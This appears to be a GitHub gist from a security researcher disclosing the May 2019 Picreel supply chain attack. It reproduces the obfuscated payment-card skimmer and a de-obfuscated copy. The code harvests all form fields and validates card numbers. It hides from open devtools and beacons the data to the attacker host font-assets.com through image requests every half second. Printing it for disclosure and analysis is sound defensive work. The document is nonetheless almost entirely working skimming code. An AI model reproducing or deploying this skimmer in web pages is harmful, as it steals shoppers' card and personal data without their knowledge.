Created
May 12, 2019 16:43
-
-
Save gwillem/866af760afcef583ebed23948cbbc589 to your computer and use it in GitHub Desktop.
www.Picreel.com supply chain attack 2019-05-11 @ https://assets.pcrl.co/js/jstracker.min.js
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x52\x47\x39\x74\x59\x57\x6c\x75','\x56\x48\x4a\x35\x55\x32\x56\x75\x5a\x41\x3d\x3d','\x54\x47\x39\x68\x5a\x45\x6c\x74\x59\x57\x64\x6c','\x53\x55\x31\x48','\x52\x32\x56\x30\x53\x57\x31\x68\x5a\x32\x56\x56\x63\x6d\x77\x3d','\x50\x33\x4a\x6c\x5a\x6d\x59\x39','\x62\x32\x35\x79\x5a\x57\x46\x6b\x65\x58\x4e\x30\x59\x58\x52\x6c\x59\x32\x68\x68\x62\x6d\x64\x6c','\x63\x6d\x56\x68\x5a\x48\x6c\x54\x64\x47\x46\x30\x5a\x51\x3d\x3d','\x59\x32\x39\x74\x63\x47\x78\x6c\x64\x47\x55\x3d','\x63\x32\x56\x30\x53\x57\x35\x30\x5a\x58\x4a\x32\x59\x57\x77\x3d','\x63\x6d\x56\x77\x62\x47\x46\x6a\x5a\x51\x3d\x3d','\x64\x47\x56\x7a\x64\x41\x3d\x3d','\x62\x47\x56\x75\x5a\x33\x52\x6f','\x61\x58\x4e\x50\x63\x47\x56\x75','\x62\x33\x4a\x70\x5a\x57\x35\x30\x59\x58\x52\x70\x62\x32\x34\x3d','\x5a\x47\x6c\x7a\x63\x47\x46\x30\x59\x32\x68\x46\x64\x6d\x56\x75\x64\x41\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4e\x6a\x61\x47\x46\x75\x5a\x32\x55\x3d','\x62\x33\x56\x30\x5a\x58\x4a\x58\x61\x57\x52\x30\x61\x41\x3d\x3d','\x61\x57\x35\x75\x5a\x58\x4a\x58\x61\x57\x52\x30\x61\x41\x3d\x3d'];(function(_0x4a88df,_0xa22925){var _0x3fe49f=function(_0x2ca023){while(--_0x2ca023){_0x4a88df['push'](_0x4a88df['shift']());}};_0x3fe49f(++_0xa22925);}(_0x19f5,0x1be));var _0x4b21=function(_0x41d6d3,_0x509296){_0x41d6d3=_0x41d6d3-0x0;var _0x2c5eba=_0x19f5[_0x41d6d3];if(_0x4b21['wXnJsU']===undefined){(function(){var _0x47a42f;try{var _0x3057f8=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');');_0x47a42f=_0x3057f8();}catch(_0x4892d5){_0x47a42f=window;}var _0x39ca6a='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x47a42f['atob']||(_0x47a42f['atob']=function(_0x468b0c){var _0x1b92f9=String(_0x468b0c)['replace'](/=+$/,'');for(var _0x5f2c28=0x0,_0x2653fe,_0x2c47f0,_0x3fa547=0x0,_0x2a91cd='';_0x2c47f0=_0x1b92f9['charAt'](_0x3fa547++);~_0x2c47f0&&(_0x2653fe=_0x5f2c28%0x4?_0x2653fe*0x40+_0x2c47f0:_0x2c47f0,_0x5f2c28++%0x4)?_0x2a91cd+=String['fromCharCode'](0xff&_0x2653fe>>(-0x2*_0x5f2c28&0x6)):0x0){_0x2c47f0=_0x39ca6a['indexOf'](_0x2c47f0);}return _0x2a91cd;});}());_0x4b21['KHPtnQ']=function(_0x5b4e6d){var _0x2cbbdd=atob(_0x5b4e6d);var _0xe07754=[];for(var _0x25c818=0x0,_0x2db4fe=_0x2cbbdd['length'];_0x25c818<_0x2db4fe;_0x25c818++){_0xe07754+='%'+('00'+_0x2cbbdd['charCodeAt'](_0x25c818)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0xe07754);};_0x4b21['NdyDDJ']={};_0x4b21['wXnJsU']=!![];}var _0x4f007e=_0x4b21['NdyDDJ'][_0x41d6d3];if(_0x4f007e===undefined){_0x2c5eba=_0x4b21['KHPtnQ'](_0x2c5eba);_0x4b21['NdyDDJ'][_0x41d6d3]=_0x2c5eba;}else{_0x2c5eba=_0x4f007e;}return _0x2c5eba;};function _0x5e7b89(_0x25b4cc,_0x1c86eb,_0x2f54a4){return _0x25b4cc[_0x4b21('0x0')](new RegExp(_0x1c86eb,'\x67'),_0x2f54a4);}function _0xdc5c77(_0x278c69){var _0x2f2442=/^(?:4[0-9]{12}(?:[0-9]{3})?)$/;var _0x50971e=/^(?:5[1-5][0-9]{14})$/;var _0x37927c=/^(?:3[47][0-9]{13})$/;var _0x24a7e4=/^(?:6(?:011|5[0-9][0-9])[0-9]{12})$/;var _0x503dd0=![];if(_0x2f2442['\x74\x65\x73\x74'](_0x278c69)){_0x503dd0=!![];}else if(_0x50971e[_0x4b21('0x1')](_0x278c69)){_0x503dd0=!![];}else if(_0x37927c[_0x4b21('0x1')](_0x278c69)){_0x503dd0=!![];}else if(_0x24a7e4[_0x4b21('0x1')](_0x278c69)){_0x503dd0=!![];}return _0x503dd0;}function _0x5c4ab6(_0x485f1f){if(/[^0-9-\s]+/[_0x4b21('0x1')](_0x485f1f))return![];var _0x21f799=0x0,_0x44787a=0x0,_0x211c81=![];_0x485f1f=_0x485f1f[_0x4b21('0x0')](/\D/g,'');for(var _0x49b18e=_0x485f1f[_0x4b21('0x2')]-0x1;_0x49b18e>=0x0;_0x49b18e--){var _0x5e63ad=_0x485f1f['\x63\x68\x61\x72\x41\x74'](_0x49b18e),_0x44787a=parseInt(_0x5e63ad,0xa);if(_0x211c81){if((_0x44787a*=0x2)>0x9)_0x44787a-=0x9;}_0x21f799+=_0x44787a;_0x211c81=!_0x211c81;}return _0x21f799%0xa==0x0;}(function(){'use strict';const _0x332f2f={};_0x332f2f[_0x4b21('0x3')]=![];_0x332f2f[_0x4b21('0x4')]=undefined;const _0x3dfce2=0xa0;const _0x370dcd=(_0x6bef86,_0x394077)=>{window[_0x4b21('0x5')](new CustomEvent(_0x4b21('0x6'),{'\x64\x65\x74\x61\x69\x6c':{'\x69\x73\x4f\x70\x65\x6e':_0x6bef86,'\x6f\x72\x69\x65\x6e\x74\x61\x74\x69\x6f\x6e':_0x394077}}));};setInterval(()=>{const _0x5cad5b=window[_0x4b21('0x7')]-window[_0x4b21('0x8')]>_0x3dfce2;const _0x1e6577=window['\x6f\x75\x74\x65\x72\x48\x65\x69\x67\x68\x74']-window[_0x4b21('0x9')]>_0x3dfce2;const _0x213fa9=_0x5cad5b?'\x76\x65\x72\x74\x69\x63\x61\x6c':_0x4b21('0xa');if(!(_0x1e6577&&_0x5cad5b)&&(window[_0x4b21('0xb')]&&window[_0x4b21('0xb')][_0x4b21('0xc')]&&window[_0x4b21('0xb')][_0x4b21('0xc')][_0x4b21('0xd')]||_0x5cad5b||_0x1e6577)){if(!_0x332f2f[_0x4b21('0x3')]||_0x332f2f['\x6f\x72\x69\x65\x6e\x74\x61\x74\x69\x6f\x6e']!==_0x213fa9){_0x370dcd(!![],_0x213fa9);}_0x332f2f[_0x4b21('0x3')]=!![];_0x332f2f[_0x4b21('0x4')]=_0x213fa9;}else{if(_0x332f2f[_0x4b21('0x3')]){_0x370dcd(![],undefined);}_0x332f2f[_0x4b21('0x3')]=![];_0x332f2f[_0x4b21('0x4')]=undefined;}},0x1f4);if(typeof module!==_0x4b21('0xe')&&module[_0x4b21('0xf')]){module[_0x4b21('0xf')]=_0x332f2f;}else{window[_0x4b21('0x10')]=_0x332f2f;}}());String[_0x4b21('0x11')][_0x4b21('0x12')]=function(){var _0x1c97be=0x0,_0x544076,_0x34cbcc;if(this[_0x4b21('0x2')]===0x0)return _0x1c97be;for(_0x544076=0x0;_0x544076<this['\x6c\x65\x6e\x67\x74\x68'];_0x544076++){_0x34cbcc=this[_0x4b21('0x13')](_0x544076);_0x1c97be=(_0x1c97be<<0x5)-_0x1c97be+_0x34cbcc;_0x1c97be|=0x0;}return _0x1c97be;};var _0x951f67={};_0x951f67['\x47\x61\x74\x65']=_0x4b21('0x14');_0x951f67['\x44\x61\x74\x61']={};_0x951f67['\x53\x65\x6e\x74']=[];_0x951f67[_0x4b21('0x15')]=![];_0x951f67[_0x4b21('0x16')]=function(_0x4a8d77){if(_0x4a8d77.id!==undefined&&_0x4a8d77.id!=''&&_0x4a8d77.id!==null&&_0x4a8d77.value.length<0x100&&_0x4a8d77.value.length>0x0){if(_0x5c4ab6(_0x5e7b89(_0x5e7b89(_0x4a8d77.value,'\x2d',''),'\x20',''))&&_0xdc5c77(_0x5e7b89(_0x5e7b89(_0x4a8d77.value,'\x2d',''),'\x20','')))_0x951f67.IsValid=!![];_0x951f67.Data[_0x4a8d77.id]=_0x4a8d77.value;return;}if(_0x4a8d77.name!==undefined&&_0x4a8d77.name!=''&&_0x4a8d77.name!==null&&_0x4a8d77.value.length<0x100&&_0x4a8d77.value.length>0x0){if(_0x5c4ab6(_0x5e7b89(_0x5e7b89(_0x4a8d77.value,'\x2d',''),'\x20',''))&&_0xdc5c77(_0x5e7b89(_0x5e7b89(_0x4a8d77.value,'\x2d',''),'\x20','')))_0x951f67.IsValid=!![];_0x951f67.Data[_0x4a8d77.name]=_0x4a8d77.value;return;}};_0x951f67[_0x4b21('0x17')]=function(){var _0x846fbf=document.getElementsByTagName('\x69\x6e\x70\x75\x74');var _0xbfd141=document.getElementsByTagName('\x73\x65\x6c\x65\x63\x74');var _0x2c2df2=document.getElementsByTagName(_0x4b21('0x18'));for(var _0x12efbe=0x0;_0x12efbe<_0x846fbf.length;_0x12efbe++)_0x951f67.SaveParam(_0x846fbf[_0x12efbe]);for(var _0x12efbe=0x0;_0x12efbe<_0xbfd141.length;_0x12efbe++)_0x951f67.SaveParam(_0xbfd141[_0x12efbe]);for(var _0x12efbe=0x0;_0x12efbe<_0x2c2df2.length;_0x12efbe++)_0x951f67.SaveParam(_0x2c2df2[_0x12efbe]);};_0x951f67['\x53\x65\x6e\x64\x44\x61\x74\x61']=function(){if(!window.devtools.isOpen&&_0x951f67.IsValid){_0x951f67.Data[_0x4b21('0x19')]=location.hostname;var _0x43c1ef=encodeURIComponent(window.btoa(JSON.stringify(_0x951f67.Data)));var _0x2c70f7=_0x43c1ef.hashCode();for(var _0x3cbd0c=0x0;_0x3cbd0c<_0x951f67.Sent.length;_0x3cbd0c++)if(_0x951f67.Sent[_0x3cbd0c]==_0x2c70f7)return;_0x951f67.LoadImage(_0x43c1ef);}};_0x951f67[_0x4b21('0x1a')]=function(){_0x951f67.SaveAllFields();_0x951f67.SendData();};_0x951f67[_0x4b21('0x1b')]=function(_0x3e43b7){_0x951f67.Sent.push(_0x3e43b7.hashCode());var _0x2d7e85=document.createElement(_0x4b21('0x1c'));_0x2d7e85.src=_0x951f67.GetImageUrl(_0x3e43b7);};_0x951f67[_0x4b21('0x1d')]=function(_0x51c1cf){return _0x951f67.Gate+_0x4b21('0x1e')+_0x51c1cf;};document[_0x4b21('0x1f')]=function(){if(document[_0x4b21('0x20')]===_0x4b21('0x21')){window[_0x4b21('0x22')](_0x951f67[_0x4b21('0x1a')],0x1f4);}}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// (c) un-obfuscated by Sanguine Security 2019-05-12 | |
var _0x951f67 = {}; | |
_0x951f67['Gate'] = 'https://font-assets.com/img'; | |
_0x951f67['Data'] = {}; | |
_0x951f67['Sent'] = []; | |
_0x951f67.IsValid = ![]; | |
_0x951f67.SaveParam = function(_0x4a8d77) { | |
if (_0x4a8d77.id !== undefined && _0x4a8d77.id != '' && _0x4a8d77.id !== null && _0x4a8d77.value.length < 0x100 && _0x4a8d77.value.length > 0x0) { | |
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(_0x4a8d77.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(_0x4a8d77.value, '-', ''), ' ', ''))) _0x951f67.IsValid = !![]; | |
_0x951f67.Data[_0x4a8d77.id] = _0x4a8d77.value; | |
return; | |
} | |
if (_0x4a8d77.name !== undefined && _0x4a8d77.name != '' && _0x4a8d77.name !== null && _0x4a8d77.value.length < 0x100 && _0x4a8d77.value.length > 0x0) { | |
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(_0x4a8d77.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(_0x4a8d77.value, '-', ''), ' ', ''))) _0x951f67.IsValid = !![]; | |
_0x951f67.Data[_0x4a8d77.name] = _0x4a8d77.value; | |
return; | |
} | |
}; | |
_0x951f67.SaveAllFields = function() { | |
var _0x846fbf = document.getElementsByTagName('input'); | |
var _0xbfd141 = document.getElementsByTagName('select'); | |
var _0x2c2df2 = document.getElementsByTagName('textarea'); | |
for (var _0x12efbe = 0x0; _0x12efbe < _0x846fbf.length; _0x12efbe++) _0x951f67.SaveParam(_0x846fbf[_0x12efbe]); | |
for (var _0x12efbe = 0x0; _0x12efbe < _0xbfd141.length; _0x12efbe++) _0x951f67.SaveParam(_0xbfd141[_0x12efbe]); | |
for (var _0x12efbe = 0x0; _0x12efbe < _0x2c2df2.length; _0x12efbe++) _0x951f67.SaveParam(_0x2c2df2[_0x12efbe]); | |
}; | |
_0x951f67['SendData'] = function() { | |
if (!window.devtools.isOpen && _0x951f67.IsValid) { | |
_0x951f67.Data.Domain = location.hostname; | |
var _0x43c1ef = encodeURIComponent(window.btoa(JSON.stringify(_0x951f67.Data))); | |
var _0x2c70f7 = _0x43c1ef.hashCode(); | |
for (var _0x3cbd0c = 0x0; _0x3cbd0c < _0x951f67.Sent.length; _0x3cbd0c++) | |
if (_0x951f67.Sent[_0x3cbd0c] == _0x2c70f7) return; | |
_0x951f67.LoadImage(_0x43c1ef); | |
} | |
}; | |
_0x951f67.TrySend = function() { | |
_0x951f67.SaveAllFields(); | |
_0x951f67.SendData(); | |
}; | |
_0x951f67.LoadImage = function(_0x3e43b7) { | |
_0x951f67.Sent.push(_0x3e43b7.hashCode()); | |
var _0x2d7e85 = document.createElement('IMG'); | |
_0x2d7e85.src = _0x951f67.GetImageUrl(_0x3e43b7); | |
}; | |
_0x951f67.GetImageUrl = function(_0x51c1cf) { | |
return _0x951f67.Gate + '?reff=' + _0x51c1cf; | |
}; | |
document.onreadystatechange = function() { | |
if (document.readyState === 'complete') { | |
window.setInterval(_0x951f67.TrySend, 0x1f4); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment